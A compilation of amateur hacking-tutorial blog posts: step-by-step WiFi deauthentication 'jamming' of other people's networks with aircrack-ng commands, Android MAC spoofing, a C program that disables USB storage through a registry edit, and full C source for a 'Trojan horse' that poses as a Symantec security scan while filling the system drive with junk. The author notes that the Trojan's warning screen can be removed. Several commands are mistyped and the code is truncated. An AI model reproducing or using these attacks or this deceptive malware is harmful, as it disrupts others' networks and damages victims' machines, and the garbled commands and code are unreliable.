Creating A WiFi Jammer With Kali Linux

Step:1) First of all you need to check the information of  connected wlan so open your kali linux terminal windows and enter this command iwconfig and hit enter button or you can execute this command airmon-ng and you will see all the details like driver,interface,chipset etc of your wlan ,in my case interface is wlan0. check your’s

Step:2) So now you need to on the monitor mode so simply execute this command airmon-ng start wlan0 ,when you execute this command you will see the changed interface name of wlan0 to wlan0mon(Remember this new name,In next step you need to put this new name in further command)

Step:3) Now you need to monitor the wife which is detected near by you.So for this give this command airodump-ng wlanomon and press enter button.you will get the list of all active wifi connection,and also get the details of all connected devices with that particular wifi network.For example in my case there are 3 wifi network available here and all the three wifi has 5-5 active connection or devices.You will get detail like bssid,channel,pwr,ENC,ESSId etc of every wifi.

Step:4) Now choose the wifi network which you want to jam for others,So simply see the mac address and channel no. of any wifi router and execude this below given command

airodump-ng c 11 –bssid cb:03:23:se4:45:AD wlan0mon

Note1: Write your channel no. instead of my which is 11 and also replace the mac address with your wifi router mac address and also write your new interface name which is in my case wlan0mon.

Note2: One space after 11  and one space after bssid and one space after mac address in above give command.

Step:5) After executing above command ,your system just only monitor one wif network.Now you will see the all device connected with that particular wifi.

Step:6) Now the time come to disconnet all the devices from wifi so simply execute this command airplay-ng -0 0 -a cb:03:23:se4:45:AD(write the bssid of wifi) wlan0mon 

Step:7) Now you will see all the devices connected with this wifi network automaticaly disconnected from it till you stop it.

Note: If you want to disconnect any particular device from wifi then read next steps

Disconnect A Single Client

Step:8) Again give the same command which you give in step 4 which is airodump-ng c 11 –bssid cb:03:23:se4:45:AD wlan0mon

Step:9) Now note the mac address of that particular connected device and give this command airplay-ng -0 0 -a cb:03:23:se4:45:AD(write the bssid of wifi) -c [copied mac address of the device] wlan0mon

Step:10) Now in the end you can disable the monitor mode by executing this command airmon-ng stop wlan0mon.

That’s it guys ,in this way you can disconnect all the device or any particular device from any particular wifi network.If you have any doubt in any steps please read the whole process twise.if you like this post please share it with your friends or social media like facebook.

How To Spoof MAC Address On Any Android Phones Using Terminal Emulater And Busybox

Here i’m not discussing upon what is mac address and how it’ll work ,and what is the use of mac address because this is not our task,we want simply to change the mac address of our device.

Step:1) First Of all you need to open your phone’s setting by simply navigating to menu icon and then go to Settings.

 

 How to Spoof MAC Address on any Android Phones using terminal emulater and busybox 


Step:2 after that simply Scroll down you’ll see a option there About button then tap on the Status option and here you’ll get a option  view WiFi Mac address so simply click on it ,Your mac address will look like  D7:23:E9:F3:46:69 
  


 
Note:  If you don’t find the wifi mac address then don’t worry some phone has different user interface so you can use one of the below given set of steps for finding yout current mac address.

  go to Settings then about phone then status then wifi mac address.

Or,

    go to Settings>About Phone>Hardware information>WiFi MAC address.

Or,

    Settings>Wireless and network>WiFi Settings>Advanced section.


Requirements For Spoofing The MAC Address

A)Terminal emulater apps which you can download it from here 
 

B)You need to install busyBox app properly in your android phone,you can dwonload it from here   

Note 1: This is make sure that before installing the terminal app you need to install BusyBox app ,and after  that you can install Terminal app
 

Note 2: make sure your android phone is rooted otherwise yoi can’t change your mac address,don’t know how to root read below given article first.

Step By Step Guide For Spoofing MAC Address:

Now follow below given set of steps to spoof your MAC address very easily.


Step:1)  First of all download terminal app from here 
 

Step:2) After that  Open the Terminal app and type the following  commands which is given bellow one by one.
   

                                  $ su [HIT ENTER]
 

                                   $ busybox iplink show eth0 [HIT ENTER]
 


    This will show your current MAC address.
 

 Step:3)  Now, type the following command and hit enter,

    $ busybox ifconfig eth0 hw ether XX:XX:XX:XX:XX:XX

  
  Note: In the above command, replace XX:XX:XX:XX:XX:XX with your new MAC address which you want to change.

 Step:4)
 almost you have done your task now for confirnation that your mac address has changed or not simply input following command and hit enter.And you will see the mac address is changed.You have successfuly spoofed your MAC address .

    $ busybox iplink show eth0[HIT ENTER]


I hope you enjoy  this post. For feedback and queries, pass your comments also don’t forget to share this article if you found bit useful.

A Virus Program That Can Disable Or Block All USB Ports Of Windows PC

Hey guys In my previous post i teach you all clear and step by step guidance on how to compile any c/c++  programand this time i am going to show how you can disable all usb port of your PC  by making a virus using c language.C is my favorite  programming language to create this type of  virus. Here i provide you simple c source code which helps you to done your work.Anyone with a basic knowledge of C language should be able to understand the working of this virus program.

For your clear understanding i want to give idea about how the source code  work ,In this tutorial you just need to compile & execute the c source code and once you execute successfully you get a .exe file which is your application which responsible for  disables or block all usb ports of your laptops.  As a result you’ll will not be able to use your pen drive or any other USB peripheral devices on the computer.
 

Now start today’s post which is overall how we can make virus using c source code follow below step by step procedure .

How TDisables USBPorts

Step:1) first of all you need the .c source code simply open notepad and copy below code as it is  and past it in notepad and save it with the name disable_usb.c (remember .c extension must include) 

#include

void main()
{
system(“reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f”);

Step:2) when you make disable_usb.cfile you need to compile it, if you don’t know how to compile then read my previous article step by step guidence to compile any c program .
 

Step:3) Now friends i assuming that Upon compilation of disable_usb.c you get disable_usb.exe 
 
Step:4) after that for block all usb port simply right click on disable_usb.exe file and click on run as administrator mode .
 
Step:5) that’s it guys you have done! Now you can see that your pen drive will never get detected when you insert it on your PC.

How TRe-Enable AllUSB Port

If you think how can i unblock all usb port after blocking ?don’t worry cool buddy here i provide you second c source code which unblock usb port .follow below steps and re-enable your usb ports.
 

Step:1) first of all open notepad and copy below code as it is  and past it in notepad and save it with the nameunblock_usb.c (remember .c extension must be include) 

#include

void main()
{
system(“reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f”);
}

Step:2) compile this unblock_usb.c file and get unblock_usb.exe file
 

Step:3) right click on unblock_usb.exeand click on run as administrator mode
That’s it friends .

How To Make Trojan Horse Virus Using C Or C++

For your clear understanding i posted this article sequence wise like what is the work of this Trojan and how this Trojan work and the main thing the algorithm of the source code lets we discuss one by one in next lines.

TheAlgorithm OThe Trojan IAFollows:

  1. Search for the root drive.
  2. Navigate to%systemroot%\Windows\System32 on the root drive.
  3. Create the file named “spceshot.dll“.
  4. Start dumping the junk data onto the above file and keep increasing its size until the drive is full.
  5. Once the drive is full, stop the process.

Step BStep Process ToMake Trojan Horse

Step:1) First of all open any text editor i am going to use simple notepad and copy below full code as it is and past it in notepad and save it with the name spaceEater.c ( don’t forget to include .c extension)

#include
#include
#include
#include
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]=”CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE”,choice;

void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs(“ANALYZING YOUR SYSTEM. PLEASE WAIT…”);
sleep(3);
gotoxy(12,8);
delline();
cputs(“PRESS ANY KEY TO START THE SYSTEM SCAN…”);
getch();
gotoxy(12,8);
delline();
findroot();
}

void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs(“THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\’VE TO DELETE THE FILE \”spceshot.dll\” LOCATED IN\n\n\r \”%windir%\\System32\”.\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.”);

if((choice=getch())!=13)
exit(0);
}

void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs(“********************************************************”);
gotoxy(12,6);
cputs(“********************************************************”);
gotoxy(12,3);
cputs(“*\n\b*\n\b*\n\b”);
gotoxy(67,3);
cputs(“*\n\b*\n\b*\n\b”);
gotoxy(14,4);
cputs(“SYMANTEC SECURITY SCAN – 2009 (QUICK SYSTEM SCANNER)”);
}

void findroot()
{
t=fopen(“C:\\windows\\explorer.exe”,”rb”);
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen(“C:\\windows\\system32\\spceshot.dll”,”rb”);
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs(“SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!”);
getch();
exit(1);
}
b=fopen(“C:\\windows\\system32\\spceshot.dll”,”wb+”);
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen(“D:\\windows\\explorer.exe”,”rb”);
if(t!=NULL)
{
fclose(t);
a=fopen(“D:\\windows\\system32\\spceshot.dll”,”rb”);
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs(“SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!”);
getch();
exit(1);
}
b=fopen(“D:\\windows\\system32\\spceshot.dll”,”wb+”);
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen(“E:\\windows\\explorer.exe”,”rb”);
if(t!=NULL)
{
fclose(t);
a=fopen(“E:\\windows\\system32\\spceshot.dll”,”rb”);
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs(“SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!”);
getch();
exit(1);
}
b=fopen(“E:\\windows\\system32\\spceshot.dll”,”wb+”);
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen(“F:\\windows\\explorer.exe”,”rb”);
if(t!=NULL)
{
fclose(t);
a=fopen(“F:\\windows\\system32\\spceshot.dll”,”rb”);
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs(“SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!”);
getch();
exit(1);
}
b=fopen(“F:\\windows\\system32\\spceshot.dll”,”wb+”);
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs(“SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.”);
getch();
exit(1);
}
exit(1);
}

void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs(“WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n”);
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf(“SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!”,vir_count);
gotoxy(12,10);
cprintf(“PRESS ANY KEY TO CLOSE…”);
getch();
break;
}
}
cputs(“.”);
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}

void showstatus()
{
gotoxy(12,8);
cputs(“SCANNING THE SYSTEM FOR THREATS”);
gotoxy(12,10);
cputs(“THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS”);
gotoxy(12,13);
cputs(“SCAN IN PROGRESS. PLEASE WAIT…”);

Step:2) After that making spaceEater.c you need to compile it if you don’t know how to compile any c program then read my previos article how to compile and execute c/c++ program 
  
Step:3) I assuming that you compilespaceEater.c file and make it likespaceEater.exe  

Step:4) Now time come To test the Trojan, just run the SpaceEater.exe file on your computer as administrator mode . It will generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up the hard disk space.
how to make a Trojan horse using c programming language
NOTE: I have purposefully added this warning screen to avoid script kiddies from misusing it. However you can edit the source code and then recompile it to remove the warning.

How TFix The DamageAnd Free UThe Space?

If you run this Trojan on your own PC then you see your full c drive fill with junks file ,now learn here how to fix the damage and free up the space.To remove the damage and free up the space, just type the following in the “run” dialog box and hit okay .
%systemroot%\system32

how to make a Trojan horse using c programming language

Now you need to search for the file “spceshot.dll“. Just delete it and you’re done.
Please pass your comments and tell me your opinion. I am just waiting for your comments.